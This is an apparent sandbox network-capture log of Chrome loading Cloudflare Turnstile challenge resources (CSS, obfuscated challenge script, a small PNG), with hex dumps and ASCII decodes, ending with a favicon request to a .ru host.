                                                          2025-01-16 04:17:33 UTC1369INData Raw: 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 2e 74 68 65 6d 65 2d 64 61 72
                                                          Data Ascii: e-dark #challenge-overlay a,.theme-dark #challenge-overlay a:link,.theme-dark #challenge-overlay a:visited{color:#bbb}.theme-dark #challenge-error-text a:active,.theme-dark #challenge-error-text a:focus,.theme-dark #challenge-error-text a:hover,.theme-dar
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 32 30 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 6c 6f 67 6f 2d 74 65 78 74 7b 66 69 6c 6c 3a 23 66 66 66 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 62 62 62 7d 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 61 63 74 69 76 65 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 66 6f 63 75 73 2c 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68
                                                          Data Ascii: 20}.theme-dark .logo-text{fill:#fff}.theme-dark #fr-helper-loop-link,.theme-dark #fr-helper-loop-link:link,.theme-dark #fr-helper-loop-link:visited{color:#bbb}.theme-dark #fr-helper-loop-link:active,.theme-dark #fr-helper-loop-link:focus,.theme-dark #fr-h
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 3b 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 31 36 36 3b 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 32 3b 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 31 30 3b 73 74 72 6f 6b 65 3a 23 64 65 31 33 30 33 3b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 61 6e 69 6d 61 74 69 6f 6e 3a 73 74 72 6f 6b 65 20 2e 36 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 66 61 69 6c 75 72 65 2d 63 72 6f 73 73 7b 66 69 6c 6c 3a 23 66 66 66 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 62 6f 74 74 6f 6d 20 63 65 6e 74 65 72 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 2d 69 6e 2e 61 6e 69 6d 61 74 69 6f 6e 7b 30 25 7b 66 69 6c 6c 3a 23 64 65 31 33 30 33 3b 73 74 72 6f 6b 65 3a 23 64 65 31
                                                          Data Ascii: ;stroke-dashoffset:166;stroke-width:2;stroke-miterlimit:10;stroke:#de1303;fill:#de1303;animation:stroke .6s cubic-bezier(.65,0,.45,1) forwards}.failure-cross{fill:#fff;transform-origin:bottom center}@keyframes fade-in.animation{0%{fill:#de1303;stroke:#de1
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 66 6c 6f 77 3a 63 6f 6c 75 6d 6e 20 6e 6f 77 72 61 70 3b 67 61 70 3a 30 3b 68 65 69 67 68 74 3a 31 34 30 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 20 30 3b 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 6c 69 6e 6b 2d 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 33 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 33 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 2e 63 62 2d 63 6f 6e 74 61 69 6e 65 72 7b 6d 61 72 67 69 6e 3a 30 20 31 32 70 78 7d 2e 73 69 7a 65 2d 63 6f 6d
                                                          Data Ascii: ay:flex;flex-flow:column nowrap;gap:0;height:140px;padding:12px 0;place-content:space-between}.size-compact .link-spacer{margin-left:3px;margin-right:3px}.size-compact .cb-c{margin:0 12px;text-align:left}.size-compact .cb-container{margin:0 12px}.size-com
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 69 7b 6c 65 66 74 3a 32 35 35 70 78 7d 2e 72 74 6c 20 23 66 72 2d 68 65 6c 70 65 72 2c 2e 72 74 6c 20 23 66 72 2d 6f 76 65 72 72 75 6e 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2e 32 35 65 6d 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 30 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 31 36 70 78 3b 77 69 64 74 68 3a 39 30 70 78 7d 2e 72 74 6c 20 23 62 72 61 6e 64 69 6e 67 2c 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 2e 72 74 6c 2e 73 69 7a 65 2d 63 6f 6d 70 61 63 74 20 23 62 72 61 6e 64 69 6e 67 7b 61 6c 69 67 6e 2d 73 65 6c 66 3a 66 6c 65
                                                          Data Ascii: i{left:255px}.rtl #fr-helper,.rtl #fr-overrun{margin-left:.25em;margin-right:0}.rtl #branding{margin:0 0 0 16px;width:90px}.rtl #branding,.rtl.size-compact #branding{padding-left:0;padding-right:0;text-align:left}.rtl.size-compact #branding{align-self:fle
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 6f 6c 6f 72 3a 23 31 36 36 33 37 39 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 6c 69 6e 6b 2c 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 7d 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 69 74 6c 65 20 2e 69 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 75 6e 73 70 75 6e 20 2e 63 69 72 63 6c 65 7b 61 6e 69 6d 61 74 69 6f 6e 3a 75 6e 73 70 69 6e 20 2e 37 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 36 35 2c 30 2c 2e 34 35 2c 31 29 20 66 6f 72 77 61 72 64 73 7d 2e 63 69 72 63 6c 65 7b 73 74 72 6f 6b 65 2d 77 69 64 74 68
                                                          Data Ascii: olor:#166379;text-decoration:underline}#challenge-error-title a:link,#challenge-error-title a:visited{color:#232323}#challenge-error-title .i-wrapper{display:none}.unspun .circle{animation:unspin .7s cubic-bezier(.65,0,.45,1) forwards}.circle{stroke-width


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.449752104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:33 UTC727OUTGET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902b4be51ba27c69&lang=auto HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:33 UTC331INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:33 GMT
                                                          Content-Type: application/javascript; charset=UTF-8
                                                          Content-Length: 113760
                                                          Connection: close
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          Server: cloudflare
                                                          CF-RAY: 902b4be979445e6e-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:33 UTC1038INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 55 52 61 4f 61 38 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 70 72 69 76 61 63 79 5f 6c 69 6e 6b 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 70 72 69 76 61 63 79 70 6f 6c 69 63 79 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70
                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.URaOa8={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F","challenge.supported_browsers":"http
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 61 6e 6b 25 32 32 25 32 30 72 65 6c 25 33 44 25 32 32 6e 6f 6f 70 65 6e 65 72 25 32 30 6e 6f 72 65 66 65 72 72 65 72 25 32 32 25 32 30 68 72 65 66 25 33 44 25 32 32 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63 6c 6f 75 64 66 6c 61 72 65 2d 63 68 61 6c 6c 65 6e 67 65 73 25 32 46 25 32 33 62 72 6f 77 73 65 72 2d 73 75 70 70 6f 72 74 25 32 32 25 33 45 43 6c 69 63 6b 25 32 30 68 65 72 65 25 32 30 66 6f 72 25 32 30 6d 6f 72 65 25 32 30 69 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 43 25 32 46 61 25 33 45 22 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75
                                                          Data Ascii: ank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","feedback_report_ou
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 2c 66 59 2c 67 61 2c 67 67 2c 67 68 2c 67 69 2c 67 73 2c 67 44 2c 67 48 2c 65 4f 2c 65 50 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 34 30 29 29 2f 31 2a 28 70 61 72 73 65 49 6e 74 28 67 49 28 36 34 38 29 29 2f 32 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 37 31 29 29 2f 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 35 33 29 29 2f 34 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 38 39 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 31 33 30 29 29 2f 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 34 32 31 29 29 2f 37 29 2b 2d 70 61 72 73 65 49
                                                          Data Ascii: ,fY,ga,gg,gh,gi,gs,gD,gH,eO,eP){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(1140))/1*(parseInt(gI(648))/2)+-parseInt(gI(1071))/3*(-parseInt(gI(1153))/4)+-parseInt(gI(1389))/5+parseInt(gI(1130))/6*(-parseInt(gI(1421))/7)+-parseI
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 6c 69 74 28 27 41 27 29 2c 42 3d 42 5b 68 6a 28 31 32 30 34 29 5d 5b 68 6a 28 31 34 38 37 29 5d 28 42 29 2c 43 3d 30 3b 43 3c 78 5b 68 6a 28 31 33 35 32 29 5d 3b 44 3d 78 5b 43 5d 2c 45 3d 6f 5b 68 6a 28 37 32 35 29 5d 28 66 6b 2c 67 2c 68 2c 44 29 2c 6f 5b 68 6a 28 31 30 34 38 29 5d 28 42 2c 45 29 3f 28 46 3d 45 3d 3d 3d 27 73 27 26 26 21 67 5b 68 6a 28 31 33 33 38 29 5d 28 68 5b 44 5d 29 2c 6f 5b 68 6a 28 37 32 36 29 5d 28 68 6a 28 37 39 36 29 2c 6f 5b 68 6a 28 31 33 34 36 29 5d 28 69 2c 44 29 29 3f 6f 5b 68 6a 28 38 38 36 29 5d 28 73 2c 6f 5b 68 6a 28 31 30 31 35 29 5d 28 69 2c 44 29 2c 45 29 3a 46 7c 7c 6f 5b 68 6a 28 38 38 36 29 5d 28 73 2c 69 2b 44 2c 68 5b 44 5d 29 29 3a 73 28 69 2b 44 2c 45 29 2c 43 2b 2b 29 3b 72 65 74 75 72 6e 20 6a 3b 66 75 6e
                                                          Data Ascii: lit('A'),B=B[hj(1204)][hj(1487)](B),C=0;C<x[hj(1352)];D=x[C],E=o[hj(725)](fk,g,h,D),o[hj(1048)](B,E)?(F=E==='s'&&!g[hj(1338)](h[D]),o[hj(726)](hj(796),o[hj(1346)](i,D))?o[hj(886)](s,o[hj(1015)](i,D),E):F||o[hj(886)](s,i+D,h[D])):s(i+D,E),C++);return j;fun
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 38 38 29 5d 5b 68 79 28 31 30 34 37 29 5d 28 68 2c 27 2a 27 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 66 71 28 63 29 7d 63 61 74 63 68 28 68 29 7b 72 65 74 75 72 6e 20 65 5b 68 79 28 37 30 33 29 5d 28 66 6f 2c 66 70 28 63 29 29 7d 7d 2c 66 72 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 68 7a 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 68 7a 3d 67 4a 2c 67 3d 7b 7d 2c 67 5b 68 7a 28 31 36 38 39 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 68 7a 28 33 33 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2d 73 7d 2c 67 5b 68 7a 28 33 38 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 25 73 7d 2c 68 3d 67 2c 6d 2c 6a 3d 33 32 2c 6c 3d 65 4d 5b 68
                                                          Data Ascii: 88)][hy(1047)](h,'*');else return fq(c)}catch(h){return e[hy(703)](fo,fp(c))}},fr=function(f,hz,g,h,i,j,k,l,m){for(hz=gJ,g={},g[hz(1689)]=function(n,s){return n+s},g[hz(332)]=function(n,s){return n-s},g[hz(385)]=function(n,s){return n%s},h=g,m,j=32,l=eM[h
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 58 4b 41 53 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4d 73 57 77 69 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4a 6e 50 65 6d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6e 4b 6d 46 51 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 56 6a 4b 4f 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 6a 29 7b 72 65 74 75 72 6e 20 68 28 69 2c 6a 29 7d 2c 27 4d 6f 53 63 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 6f 58 76 4f 64 27 3a 68 42 28 31 31 37 31 29 2c 27 6b 62 6c 61 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75
                                                          Data Ascii: XKASq':function(h,i){return h==i},'MsWwi':function(h,i){return h<<i},'JnPem':function(h,i){return h(i)},'nKmFQ':function(h,i){return i==h},'VjKOC':function(h,i,j){return h(i,j)},'MoSch':function(h,i){return h>i},'oXvOd':hB(1171),'kblah':function(h,i){retu
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 30 29 5d 28 49 2c 64 5b 68 45 28 31 36 35 35 29 5d 28 6a 2c 31 29 29 3f 28 49 3d 30 2c 47 5b 68 45 28 39 33 32 29 5d 28 64 5b 68 45 28 31 35 33 35 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4d 3d 31 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 45 28 38 36 37 29 5d 28 48 2c 31 29 7c 4d 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 45 28 39 33 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3d 30 2c 73 2b 2b 29 3b 66 6f 72 28 4d 3d 43 5b 68 45 28 31 35 30 36 29 5d 28 30 29 2c 73 3d 30 3b 64 5b 68 45 28 38 35 37 29 5d 28 31 36 2c 73 29 3b 48 3d 48 3c 3c 31 2e 34 7c 64 5b 68 45 28 36 39 38 29 5d 28 4d 2c 31 29 2c 49 3d 3d 64 5b 68 45 28 34 36 30 29 5d 28 6a 2c 31 29 3f 28 49
                                                          Data Ascii: 0)](I,d[hE(1655)](j,1))?(I=0,G[hE(932)](d[hE(1535)](o,H)),H=0):I++,M>>=1,s++);}else{for(M=1,s=0;s<F;H=d[hE(867)](H,1)|M,j-1==I?(I=0,G[hE(932)](o(H)),H=0):I++,M=0,s++);for(M=C[hE(1506)](0),s=0;d[hE(857)](16,s);H=H<<1.4|d[hE(698)](M,1),I==d[hE(460)](j,1)?(I
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 26 4d 29 2c 49 3d 3d 6a 2d 31 3f 28 49 3d 30 2c 47 5b 68 45 28 39 33 32 29 5d 28 64 5b 68 45 28 38 31 30 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 44 2d 2d 2c 64 5b 68 45 28 31 30 38 33 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 68 45 28 38 33 31 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 7d 65 6c 73 65 20 66 6f 72 28 4d 3d 78 5b 43 5d 2c 73 3d 30 3b 73 3c 46 3b 48 3d 64 5b 68 45 28 31 32 39 33 29 5d 28 48 2c 31 29 7c 31 26 4d 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 68 45 28 39 33 32 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 44 2d 2d 2c 64 5b 68 45 28 37 39 39 29 5d 28 30 2c 44 29 26 26 46 2b 2b 7d 7d 66 6f 72 28 4d 3d
                                                          Data Ascii: &M),I==j-1?(I=0,G[hE(932)](d[hE(810)](o,H)),H=0):I++,M>>=1,s++);}D--,d[hE(1083)](0,D)&&(D=Math[hE(831)](2,F),F++),delete B[C]}}else for(M=x[C],s=0;s<F;H=d[hE(1293)](H,1)|1&M,j-1==I?(I=0,G[hE(932)](o(H)),H=0):I++,M>>=1,s++);D--,d[hE(799)](0,D)&&F++}}for(M=
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 28 36 39 38 29 5d 28 48 2c 49 29 2c 49 3e 3e 3d 31 2c 64 5b 68 49 28 31 31 34 39 29 5d 28 30 2c 49 29 26 26 28 49 3d 6a 2c 48 3d 6f 28 4a 2b 2b 29 29 2c 4b 7c 3d 28 30 3c 4f 3f 31 3a 30 29 2a 47 2c 47 3c 3c 3d 31 29 3b 50 3d 64 5b 68 49 28 31 31 35 39 29 5d 28 65 2c 4b 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 32 3a 72 65 74 75 72 6e 27 27 7d 66 6f 72 28 46 3d 78 5b 33 5d 3d 50 2c 45 5b 68 49 28 39 33 32 29 5d 28 50 29 3b 3b 29 69 66 28 64 5b 68 49 28 36 36 37 29 5d 21 3d 3d 64 5b 68 49 28 31 30 37 30 29 5d 29 7b 69 66 28 4a 3e 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4b 3d 30 2c 4c 3d 4d 61 74 68 5b 68 49 28 38 33 31 29 5d 28 32 2c 44 29 2c 47 3d 31 3b 47 21 3d 4c 3b 4f 3d 49 26 48 2c 49 3e 3e 3d 31 2c 30 3d 3d 49 26 26 28 49 3d 6a 2c 48 3d 6f 28 4a 2b
                                                          Data Ascii: (698)](H,I),I>>=1,d[hI(1149)](0,I)&&(I=j,H=o(J++)),K|=(0<O?1:0)*G,G<<=1);P=d[hI(1159)](e,K);break;case 2:return''}for(F=x[3]=P,E[hI(932)](P);;)if(d[hI(667)]!==d[hI(1070)]){if(J>i)return'';for(K=0,L=Math[hI(831)](2,D),G=1;G!=L;O=I&H,I>>=1,0==I&&(I=j,H=o(J+
                                                          2025-01-16 04:17:33 UTC1369INData Raw: 65 33 2c 65 4d 5b 69 69 28 31 34 36 38 29 5d 5b 69 69 28 31 31 37 34 29 5d 28 65 5b 69 69 28 35 33 32 29 5d 28 32 2c 66 29 2c 33 32 29 29 2c 65 4d 5b 69 69 28 35 35 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 69 6a 29 7b 69 6a 3d 69 69 2c 65 4d 5b 69 6a 28 38 38 38 29 5d 26 26 28 65 4d 5b 69 6a 28 31 34 37 37 29 5d 5b 69 6a 28 31 35 33 33 29 5d 28 29 2c 65 4d 5b 69 6a 28 31 34 37 37 29 5d 5b 69 6a 28 31 34 30 35 29 5d 28 29 2c 65 4d 5b 69 6a 28 31 35 32 37 29 5d 3d 21 21 5b 5d 2c 65 4d 5b 69 6a 28 38 38 38 29 5d 5b 69 6a 28 31 30 34 37 29 5d 28 7b 27 73 6f 75 72 63 65 27 3a 65 5b 69 6a 28 35 38 36 29 5d 2c 27 77 69 64 67 65 74 49 64 27 3a 65 4d 5b 69 6a 28 31 35 30 34 29 5d 5b 69 6a 28 36 30 36 29 5d 2c 27 65 76 65 6e 74 27 3a 65 5b 69 6a 28 31 31 39 31 29 5d
                                                          Data Ascii: e3,eM[ii(1468)][ii(1174)](e[ii(532)](2,f),32)),eM[ii(554)](function(ij){ij=ii,eM[ij(888)]&&(eM[ij(1477)][ij(1533)](),eM[ij(1477)][ij(1405)](),eM[ij(1527)]=!![],eM[ij(888)][ij(1047)]({'source':e[ij(586)],'widgetId':eM[ij(1504)][ij(606)],'event':e[ij(1191)]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.449751104.18.95.414432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:33 UTC739OUTGET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: image
                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/7g7ou/0x4AAAAAAA0MDA1Jbl1ciyqP/auto/fbE/normal/auto/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2025-01-16 04:17:33 UTC240INHTTP/1.1 200 OK
                                                          Date: Thu, 16 Jan 2025 04:17:33 GMT
                                                          Content-Type: image/png
                                                          Content-Length: 61
                                                          Connection: close
                                                          cache-control: max-age=2629800, public
                                                          Server: cloudflare
                                                          CF-RAY: 902b4be97e828c84-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          2025-01-16 04:17:33 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                          Data Ascii: PNGIHDRsIDAT$IENDB`


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.449742104.21.85.1294432312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2025-01-16 04:17:33 UTC1315OUTGET /favicon.ico HTTP/1.1
                                                          Host: guf1.xemirax.ru
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
